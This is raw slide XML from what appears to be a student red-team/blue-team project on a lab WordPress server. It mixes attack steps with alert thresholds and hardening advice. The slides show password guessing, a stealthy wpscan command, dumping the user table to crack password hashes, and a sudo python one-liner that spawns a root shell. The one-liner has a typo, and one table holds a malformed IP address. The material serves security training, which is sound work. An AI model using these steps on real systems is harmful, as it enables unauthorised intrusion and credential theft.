Shape;1413;p81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8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6" name="Google Shape;1416;p8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17" name="Google Shape;1417;p8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8" name="Google Shape;1418;p8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9" name="Google Shape;1419;p8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0" name="Google Shape;1420;p8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1" name="Google Shape;1421;p82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82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423" name="Google Shape;142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82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82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82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428" name="Google Shape;142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82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82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82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433" name="Google Shape;143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82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6" name="Google Shape;1436;p82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82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438" name="Google Shape;143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82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1" name="Google Shape;1441;p82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82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443" name="Google Shape;144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82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6" name="Google Shape;1446;p82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82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448" name="Google Shape;144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82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1" name="Google Shape;1451;p82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82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453" name="Google Shape;14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5" name="Google Shape;1455;p82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82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82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458" name="Google Shape;14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0" name="Google Shape;1460;p8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8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8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8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8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8" name="Google Shape;1468;p83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83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70" name="Google Shape;1470;p83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471" name="Google Shape;1471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2" name="Google Shape;1472;p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83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1474" name="Google Shape;1474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83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83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78" name="Google Shape;1478;p83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479" name="Google Shape;1479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0" name="Google Shape;1480;p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83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83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" name="Google Shape;1484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84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8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7" name="Google Shape;1487;p8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88" name="Google Shape;1488;p8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9" name="Google Shape;1489;p8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0" name="Google Shape;1490;p8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1" name="Google Shape;1491;p8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2" name="Google Shape;1492;p84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84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84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5" name="Google Shape;1495;p84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6" name="Google Shape;1496;p84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7" name="Google Shape;1497;p84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1498" name="Google Shape;1498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9" name="Google Shape;1499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84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1" name="Google Shape;1501;p84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2" name="Google Shape;1502;p84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3" name="Google Shape;1503;p84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8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6" name="Google Shape;1506;p8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07" name="Google Shape;1507;p8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8" name="Google Shape;1508;p8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09" name="Google Shape;1509;p8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0" name="Google Shape;1510;p8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1" name="Google Shape;1511;p85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85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85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85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5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5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7" name="Google Shape;1517;p85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85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85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85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85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5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3" name="Google Shape;1523;p85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4" name="Google Shape;1524;p85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85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5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7" name="Google Shape;1527;p85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8" name="Google Shape;1528;p85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9" name="Google Shape;1529;p85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0" name="Google Shape;1530;p85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8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4" name="Google Shape;1534;p8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35" name="Google Shape;1535;p8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6" name="Google Shape;1536;p8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37" name="Google Shape;1537;p8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8" name="Google Shape;1538;p8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9" name="Google Shape;1539;p8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0" name="Google Shape;1540;p8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8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8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4" name="Google Shape;1544;p8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5" name="Google Shape;1545;p8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46" name="Google Shape;1546;p8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8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8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8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8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8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8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54" name="Google Shape;1554;p8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5" name="Google Shape;1555;p8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6" name="Google Shape;1556;p8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7" name="Google Shape;1557;p8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8" name="Google Shape;1558;p87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8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8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87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3" name="Google Shape;1563;p87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4" name="Google Shape;1564;p87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65" name="Google Shape;1565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88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72" name="Google Shape;1572;p8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73" name="Google Shape;1573;p8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4" name="Google Shape;1574;p8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75" name="Google Shape;1575;p8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6" name="Google Shape;1576;p8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77" name="Google Shape;1577;p88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78" name="Google Shape;1578;p88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88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88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88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2" name="Google Shape;1582;p88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3" name="Google Shape;1583;p88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84" name="Google Shape;1584;p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89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8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8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2" name="Google Shape;1592;p8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3" name="Google Shape;159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4" name="Google Shape;1594;p8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5" name="Google Shape;1595;p8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89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7" name="Google Shape;1597;p89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89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89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89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1" name="Google Shape;1601;p89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2" name="Google Shape;1602;p89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03" name="Google Shape;1603;p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11" name="Google Shape;1611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2" name="Google Shape;1612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13" name="Google Shape;1613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4" name="Google Shape;1614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9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6" name="Google Shape;1616;p9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9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9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9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9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1" name="Google Shape;1621;p9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2" name="Google Shape;1622;p9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9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24" name="Google Shape;1624;p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9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9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2" name="Google Shape;1632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3" name="Google Shape;1633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4" name="Google Shape;1634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35" name="Google Shape;1635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6" name="Google Shape;1636;p9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91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8" name="Google Shape;1638;p9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9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9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91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3" name="Google Shape;1643;p91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4" name="Google Shape;1644;p9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9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46" name="Google Shape;164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92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9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4" name="Google Shape;1654;p9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55" name="Google Shape;1655;p9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6" name="Google Shape;1656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57" name="Google Shape;1657;p9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9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9" name="Google Shape;1659;p92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0" name="Google Shape;1660;p92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2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92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92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4" name="Google Shape;1664;p92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5" name="Google Shape;1665;p92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6" name="Google Shape;1666;p92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92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68" name="Google Shape;1668;p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2" name="Google Shape;72;p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" name="Google Shape;74;p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3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9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6" name="Google Shape;1676;p9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77" name="Google Shape;1677;p9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8" name="Google Shape;1678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9" name="Google Shape;1679;p9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0" name="Google Shape;1680;p9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1" name="Google Shape;1681;p93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2" name="Google Shape;1682;p93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93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93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93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6" name="Google Shape;1686;p93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7" name="Google Shape;1687;p93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8" name="Google Shape;1688;p93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93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90" name="Google Shape;1690;p9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9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9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9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8" name="Google Shape;1698;p9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99" name="Google Shape;1699;p9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1" name="Google Shape;1701;p9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2" name="Google Shape;1702;p9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3" name="Google Shape;1703;p9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9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9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9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9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9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9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0" name="Google Shape;1710;p9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1" name="Google Shape;1711;p9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2" name="Google Shape;1712;p9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3" name="Google Shape;1713;p9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714" name="Google Shape;1714;p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9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9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9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95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3" name="Google Shape;1723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24" name="Google Shape;1724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5" name="Google Shape;1725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6" name="Google Shape;1726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7" name="Google Shape;1727;p9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8" name="Google Shape;1728;p9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9" name="Google Shape;1729;p95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5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5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5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95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95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5" name="Google Shape;1735;p95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6" name="Google Shape;1736;p95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7" name="Google Shape;1737;p95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8" name="Google Shape;1738;p95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739" name="Google Shape;1739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96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9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48" name="Google Shape;1748;p9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49" name="Google Shape;1749;p9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0" name="Google Shape;1750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1" name="Google Shape;1751;p9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2" name="Google Shape;1752;p9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3" name="Google Shape;1753;p96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4" name="Google Shape;1754;p96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6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6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6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6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96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0" name="Google Shape;1760;p96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1" name="Google Shape;1761;p96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2" name="Google Shape;1762;p9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3" name="Google Shape;1763;p96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764" name="Google Shape;1764;p9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97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3" name="Google Shape;1773;p9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74" name="Google Shape;1774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5" name="Google Shape;1775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6" name="Google Shape;1776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7" name="Google Shape;1777;p9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8" name="Google Shape;1778;p97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9" name="Google Shape;1779;p97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97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7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97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7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97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5" name="Google Shape;1785;p97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6" name="Google Shape;1786;p97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97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97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789" name="Google Shape;1789;p9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9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9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8" name="Google Shape;1798;p9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9" name="Google Shape;1799;p9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0" name="Google Shape;1800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01" name="Google Shape;1801;p9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2" name="Google Shape;1802;p9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3" name="Google Shape;1803;p9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9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6" name="Google Shape;1806;p9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8" name="Google Shape;1808;p9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0" name="Google Shape;1810;p9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2" name="Google Shape;1812;p9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4" name="Google Shape;1814;p9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9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16" name="Google Shape;1816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8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99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6" name="Google Shape;1826;p9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27" name="Google Shape;182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8" name="Google Shape;1828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29" name="Google Shape;1829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9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1" name="Google Shape;1831;p99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99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99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4" name="Google Shape;1834;p99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9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6" name="Google Shape;1836;p99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9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99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9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0" name="Google Shape;1840;p99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9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99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9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00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4" name="Google Shape;1854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5" name="Google Shape;1855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6" name="Google Shape;1856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7" name="Google Shape;1857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9" name="Google Shape;1859;p100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0" name="Google Shape;1860;p100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00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00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00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4" name="Google Shape;1864;p100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100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6" name="Google Shape;1866;p100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100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8" name="Google Shape;1868;p100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00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00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100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72" name="Google Shape;1872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0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100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01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83" name="Google Shape;1883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4" name="Google Shape;1884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5" name="Google Shape;1885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6" name="Google Shape;1886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7" name="Google Shape;1887;p101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8" name="Google Shape;1888;p101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01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0" name="Google Shape;1890;p101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01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01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101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4" name="Google Shape;1894;p101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101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6" name="Google Shape;1896;p101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101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01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01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0" name="Google Shape;1900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101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101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9" name="Google Shape;1909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0" name="Google Shape;1910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1" name="Google Shape;1911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2" name="Google Shape;1912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3" name="Google Shape;1913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0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0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6" name="Google Shape;1916;p10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10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8" name="Google Shape;1918;p10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0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0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0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2" name="Google Shape;1922;p10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0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0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10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0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0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8" name="Google Shape;1928;p10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10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30" name="Google Shape;1930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10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10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56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Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId10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7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  <p:sldLayoutId id="2147483751" r:id="rId50"/>
    <p:sldLayoutId id="2147483752" r:id="rId51"/>
    <p:sldLayoutId id="2147483753" r:id="rId52"/>
    <p:sldLayoutId id="2147483754" r:id="rId53"/>
    <p:sldLayoutId id="2147483755" r:id="rId54"/>
    <p:sldLayoutId id="2147483756" r:id="rId55"/>
    <p:sldLayoutId id="2147483757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137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Chad Skeen</a:t>
            </a:r>
            <a:endParaRPr sz="6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NOPASSWD: /usr/bin/python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2414" name="Google Shape;2414;p1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15" name="Google Shape;2415;p14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Logged in as “steven” and running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> showed that this user can execute python commands without a password, including sudo commands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exploit allows the attacker to gain root access, fully compromising the system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$ sudo python -c ‘import pty;pty:spawn(“/bin/bash”)’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16" name="Google Shape;241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725" y="6510325"/>
            <a:ext cx="16977451" cy="36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Google Shape;242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14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11</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2423" name="Google Shape;2423;p147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24" name="Google Shape;2424;p147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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open SSH/Poor Password Policy</a:t>
            </a:r>
            <a:endParaRPr sz="54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0" name="Google Shape;2430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31" name="Google Shape;2431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 Excessive HTTP Errors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http.response.status.code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  Above 400 for the last minute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marL="457200" marR="0" lvl="0" indent="-450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Char char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limit the wpscan site enumeration by section, ie: enumerating users only.</a:t>
            </a:r>
            <a:endParaRPr sz="3500" i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a: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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Running a more stealthy scan making it hard to detect</a:t>
            </a:r>
            <a:endParaRPr sz="3500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500" i="1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 </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr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wpscan --url 192.168.1.110/wordpress --stealthy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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Poor Database Configuration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2437" name="Google Shape;2437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38" name="Google Shape;2438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r>
              <a:rPr lang="en-US" sz="4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CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr sz="4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r>
              <a:rPr lang="en-US" sz="4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CPU usage across all documents</a:t>
            </a:r>
            <a:endParaRPr sz="4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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&gt;50% for the last 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="39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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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dependent upon the size of the database. The database dump would need to be done quickly, so determine the size of the database before dumping.</a:t>
            </a:r>
            <a:endParaRPr sz="4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Instead of dumping the entire database, dump just the user information. This will be a much smaller table within the larger database.</a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOPASSWD: /usr/bin/python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2444" name="Google Shape;2444;p1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45" name="Google Shape;2445;p15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None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None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 None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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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alert was created to import server logs showing sudo usage. However, in this attack, it was single command usage, which would generally not trigger alerts.</a:t>
            </a:r>
            <a:endParaRPr sz="40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15</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2452" name="Google Shape;2452;p151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Appendix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53" name="Google Shape;2453;p151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459" name="Google Shape;2459;p1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60" name="Google Shape;2460;p15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461" name="Google Shape;2461;p152"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952463" y="3255275"/>
          <a:ext cx="21995625" cy="9479160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0E19367C-A7B1-438D-AF79-2403A4AAA8DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="668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SSH/Poor password policies</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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Poor password policies enabled the attacker to guess the password of “michael” and crack the password of “steven”</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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Allowing connections with password only authentication creates the possibility of full system compromise</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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Poor web and database configuration</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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gained access to the WordPress database due to poor configuration. The username and password were accessible by any user on the server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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attacker to dump the database and copy to local system, which was used to crack the hashed passwords.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>NOPASSWD: /usr/bin/python</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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the attacker to run a single line of python code to gain root access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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a total compromise of the system.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731377" y="4318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Blue Team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Network Defense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7" name="Google Shape;2467;p1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68" name="Google Shape;2468;p15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475" name="Google Shape;2475;p1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476" name="Google Shape;2476;p15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15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478" name="Google Shape;2478;p15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479" name="Google Shape;2479;p15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Alerts Implemented</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2480" name="Google Shape;2480;p15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Hardening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2481" name="Google Shape;2481;p15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Implementing Patches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6" name="Google Shape;2486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155"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="5165600"/>
            <a:ext cx="22914900" cy="34614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15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19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138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Red Team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3" name="Google Shape;2343;p1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44" name="Google Shape;2344;p13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56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2494" name="Google Shape;2494;p156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56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496" name="Google Shape;2496;p156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7" name="Google Shape;2497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875" y="2507350"/>
            <a:ext cx="12953624" cy="103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5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503" name="Google Shape;2503;p1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504" name="Google Shape;2504;p15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505" name="Google Shape;2505;p157"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="828825" y="472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{0E19367C-A7B1-438D-AF79-2403A4AAA8DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="74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/>
                        <a:t>SSH/Poor Password Policies </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>By easily guessing Michael’s password, this escalated our ability to crack Steven’s password. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>Simple and easy passwords can allow attackers to gain all types of access of system. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>Poor Web and Database Configuration </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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</a:rPr>
                        <a:t>A wp-scan enumeration command exposes vulnerabilities of the website and its users. The SQL database was found in the directory on the web server. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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</a:rPr>
                        <a:t>Attacker is exposed to the website’s vulnerabilities such as its users thus accelerating their access to the usernames and privileges to login. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>NOPASSWD: /usr/bin/python</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>A single line of python that is easily accessible online allows for root access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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/>
                        <a:t>Total compromise of system. </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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0" name="Google Shape;2510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11" name="Google Shape;2511;p158"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="6009650"/>
            <a:ext cx="22914900" cy="17733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 Implemented</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2512" name="Google Shape;2512;p15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22</a:t>
            </a:fld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15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Excessive HTTP Errors Alert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2518" name="Google Shape;2518;p1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519" name="Google Shape;2519;p15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Metric: Packetbeat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Threshold: Alert gets triggered when a grouped count of over 5 ‘http response status code’ exceeds 400 in the last 5 minutes.  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Detects any failed login attempts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20" name="Google Shape;252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50" y="4839900"/>
            <a:ext cx="13475133" cy="75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6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 Size Monitor Alert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2526" name="Google Shape;2526;p1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527" name="Google Shape;2527;p16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Metric: Packetbeat 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Threshold: Alert triggers when the sum of ‘http request bytes’ exceeds 3500 events for the last 1 minute. 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Detect any brute force attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3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>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2528" name="Google Shape;2528;p160"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="12211"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807000" y="5894700"/>
            <a:ext cx="10035049" cy="67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16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Usage Monitor Alert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2534" name="Google Shape;2534;p16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535" name="Google Shape;2535;p16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1"/>
              </a:solidFill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Metric: Metricbeat </a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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Threshold: Alert threshold triggers when max of ‘system process cpu total pct’  exceeds above 50% for the last 5 minutes. </a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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Utilizing user resources </a:t>
            </a:r>
            <a:endParaRPr sz="3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536" name="Google Shape;253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950" y="4588252"/>
            <a:ext cx="10242325" cy="75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1" name="Google Shape;2541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42" name="Google Shape;2542;p162"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="5861000"/>
            <a:ext cx="22914900" cy="2070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Hardening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43" name="Google Shape;2543;p16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26</a:t>
            </a:fld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6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Hardening Against Open SSH Ports &amp; Poor Password on Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="5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9" name="Google Shape;2549;p16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550" name="Google Shape;2550;p16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Filter Port 22 by whitelisting authorized user IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2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■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command: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Require SSH private key </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2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■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command: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Implement a stronger password policy</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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Minimum length </a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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Caps/lowercase combo</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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Numbers</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3" indent="-457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Special characters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551" name="Google Shape;2551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925" y="5927325"/>
            <a:ext cx="7864175" cy="7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650" y="4183825"/>
            <a:ext cx="9490226" cy="5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16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Web &amp; Database Configuration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8" name="Google Shape;2558;p16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559" name="Google Shape;2559;p16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Isolate the SQL data into another network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Establishing principle of least privilege in important files inside the database</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2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■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our example we chose /var/www with the command (Michael’s privileges)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Update SQL and update WordPress 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i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2560" name="Google Shape;2560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1650" y="7229750"/>
            <a:ext cx="10176451" cy="57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16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NOPASSWD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6" name="Google Shape;2566;p16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567" name="Google Shape;2567;p165"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2564975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Address this vulnerability by editing the /etc/sudoers file.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Remove Michael or limited privileges</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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This works due to requiring a password for all sudo commands.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Example: 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$ sudo nano /etc/sudoers </a:t>
            </a:r>
            <a:endParaRPr sz="4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  Comment out or remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="44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(ALL) NOPASSWD: /usr/bin/python</a:t>
            </a:r>
            <a:endParaRPr sz="4400"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Example: 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568" name="Google Shape;2568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25" y="8419825"/>
            <a:ext cx="19743275" cy="5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51" name="Google Shape;2351;p1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352" name="Google Shape;2352;p1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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2356" name="Google Shape;2356;p139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Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2357" name="Google Shape;2357;p139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Maintaining Access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3" name="Google Shape;2573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74" name="Google Shape;2574;p166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731280" y="5711450"/>
            <a:ext cx="22914900" cy="236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Implementing Patches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75" name="Google Shape;2575;p16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30</a:t>
            </a:fld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6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Patches with Ansible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1" name="Google Shape;2581;p16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2582" name="Google Shape;2582;p16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Playbook Overview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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weak Passwords: PAM Module (ensures password complexibility)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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress: Updating site can prevent user enumeration and other malicious attacks.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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL: Updating database to ensure user credentials are not in plain text in the configuration files to prevent future malicious attacks.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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ELK Server: Consistently manage server to make it is continuously updated for best monitoring practices.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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux OS: Update ensures the latest patching of the OS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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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Network Forensics and Analysis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8" name="Google Shape;2588;p16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2589" name="Google Shape;2589;p16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6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596" name="Google Shape;2596;p16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2597" name="Google Shape;2597;p16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16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599" name="Google Shape;2599;p169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2600" name="Google Shape;2600;p169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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2601" name="Google Shape;2601;p169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Normal Activity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2602" name="Google Shape;2602;p169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170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17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34</a:t>
            </a:fld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71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2614" name="Google Shape;2614;p17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15" name="Google Shape;2615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450" y="204450"/>
            <a:ext cx="13954249" cy="135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7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621" name="Google Shape;2621;p17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2622" name="Google Shape;2622;p17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Vulnerabilities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SSH/Poor password policies - High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Poor web and database configuration - High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NOPASSWD: /usr/bin/python - Critical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173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17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37</a:t>
            </a:fld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7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2634" name="Google Shape;2634;p17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2635" name="Google Shape;2635;p17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636" name="Google Shape;2636;p174"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176963" y="35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{0E19367C-A7B1-438D-AF79-2403A4AAA8DA}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/>
                        <a:t>172.16.4.2015 &amp; 185.243.115.84</a:t>
                      </a:r>
                      <a:endParaRPr sz="37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UDP - TCP - &amp; HTTP </a:t>
                      </a:r>
                      <a:endParaRPr sz="4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705</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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4</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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1 - We found Trojans</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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17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2643" name="Google Shape;2643;p17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Purpose of Traffic on the Network</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
